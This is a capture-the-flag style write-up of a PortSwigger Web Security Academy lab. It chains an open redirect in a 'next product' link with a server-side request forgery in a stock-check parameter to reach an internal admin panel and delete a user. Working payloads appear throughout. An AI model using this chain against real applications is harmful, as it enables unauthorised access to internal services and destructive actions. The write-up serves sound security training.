| Field | Value |
|---|---|
| Platform | PortSwigger Web Security Academy |
| Type | SSRF — Open Redirect Filter Bypass |
| Difficulty | Practitioner |
| Objective | Bypass the SSRF filter using an open redirect to reach http://192.168.0.12:8080/admin and delete carlos |
SSRF with Filter Bypass via Open Redirection Vulnerability — Writeup¶
Initial Observation¶
Intercepting the stock check request:
stockApi=/product/stock/check?productId=1%26storeId=1
This time stockApi is a relative path — the server only fetches URLs within its own domain. Injecting an external IP or localhost directly would be filtered. We need something the filter accepts.
Confirming the domain restriction — swapping to the full application URL works fine:
stockApi=https://0a1900ad03a488a082b751cd00230068.web-security-academy.net/product/stock/check?productId=1%26storeId=1
The filter allows the application's own domain. Now we need a path on that domain that can redirect us somewhere else.
Finding the Open Redirect¶
Looking at the product page — there's a "Next product" link:
/product/nextProduct?currentProductId=1&path=/product?productId=2
The path parameter controls where the redirect goes. Testing with an external domain:
/product/nextProduct?currentProductId=1&path=https://google.com
Redirects to Google. Open redirect confirmed — path is completely unsanitized.
Chaining Open Redirect + SSRF¶
The filter accepts the application's own domain. The application has an open redirect at /product/nextProduct. Pointing stockApi at the redirect endpoint with the internal admin URL as the path:
stockApi=/product/nextProduct?currentProductId=1%26path=http://192.168.0.12:8080/admin
(%26 is & — needed to avoid the path= value being parsed as a separate query parameter at the stockApi level)
The filter sees a path on the allowed domain — passes. The server follows the redirect — lands on the internal admin interface.
Admin panel returns in the response. Sending the delete request:
stockApi=/product/nextProduct?currentProductId=1%26path=http://192.168.0.12:8080/admin/delete?username=carlos
Again, carlos account deleted... Lab Solved.